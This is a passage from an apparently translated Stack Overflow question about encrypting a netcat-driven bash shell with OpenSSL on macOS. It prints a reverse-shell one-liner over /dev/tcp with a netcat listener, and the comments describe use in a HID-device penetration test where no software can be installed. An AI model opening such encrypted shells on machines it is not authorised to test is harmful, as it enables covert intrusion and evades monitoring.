使用 OpenSSL 加密 Netcat 数据答案

【问题标题】：Encrypting Netcat data with OpenSSL使用 OpenSSL 加密 Netcat 数据
【发布时间】：2013-06-24 04:57:51
【问题描述】：

所以我有一个由 netcat 管理的基本通信流。例如，用户可以创建一个 bash shell 并将控制权转发到 localhost 的 5555 端口。您如何通过 OpenSSL 进行管道传输以实现对称加密的连接？我只能使用安装在 OSX 机器上的工具。

创建外壳

bash -i >& /dev/tcp/localhost/5555 0>&1

抓壳

nc -l -p 5555

使用 OpenSSL 加密数据

openssl aes-256-cbc -salt -a -e -in plaintext.txt -out encrypted.txt

使用 OpenSSL 解密数据

openssl aes-256-cbc -salt -a -d -in encrypted.txt -out plaintext.txt

我正在寻找的东西

bash -i & | openssl -e > /dev/tcp/localhost/5555 0>&1
nc -l -p 5555 | openssl -d

【问题讨论】：

用socat怎么样，不也算吗？隧道？ openssl 本身有 "connect"、"s_server" 和 "s_client" 选项，并且可以将数据放在它的 STDIN 上。 en.wikipedia.org/wiki/Netcat#Variants dest-unreach.org/socat/doc/socat-openssltunnel.html
嗯，所有这些选项都是完美的。不幸的是，我只能使用安装在 OSX 机器上的工具。

标签： macos bash encryption openssl netcat

【解决方案1】：

根据您评论中的其他信息，安装 MacPorts，并尝试使用移植的 socat 或 stunnel。

dtpwmbp:~ pwadas$ uname -a ; sudo port list |egrep -i socat\|stunnel
Darwin dtpwmbp 12.4.0 Darwin Kernel Version 12.4.0: Wed May  1 17:57:12 PDT 2013; root:xnu-2050.24.15~1/RELEASE_X86_64 x86_64
stunnel                        @4.47           security/stunnel
socat                          @1.7.2.1        sysutils/socat
dtpwmbp:~ pwadas$

http://www.macports.org

【讨论】：

题外话，但你真的应该接受一些幻想训练。 dtpwmbp - 可能是（DT）？ (P)iotr (W)adas (M)ac(B)ook(Pro) - 但抱歉，这是 MAC 计算机的可怕名称... ;) :) :)
大声笑，我只有一台私人使用的mac，我不打算拥有更多。我也称我的猫为“猫”，摩托车有自己的名字你知道的 ;-) DT 是一个昵称 :) cv.dtpw.pl 。说jm666。至少可以是 jm686 :P
这将涉及“安装”一些东西。对不起，我很痛苦。这是通过 HID 设备进行的渗透测试，用户无权安装任何东西。
如果是为了渗透测试，为什么要关心加密？真正的攻击者不会。而且，理论上，您仍然可以选择“安装”基于 shell 的东西而无需升级权限，或者如果您能够获得 shell 访问权限，则可以从其他地方将其复制到预编译中。
问题也许应该移到 superuser.com 、 security.stackexchange.com 或 apple.stackexchange.com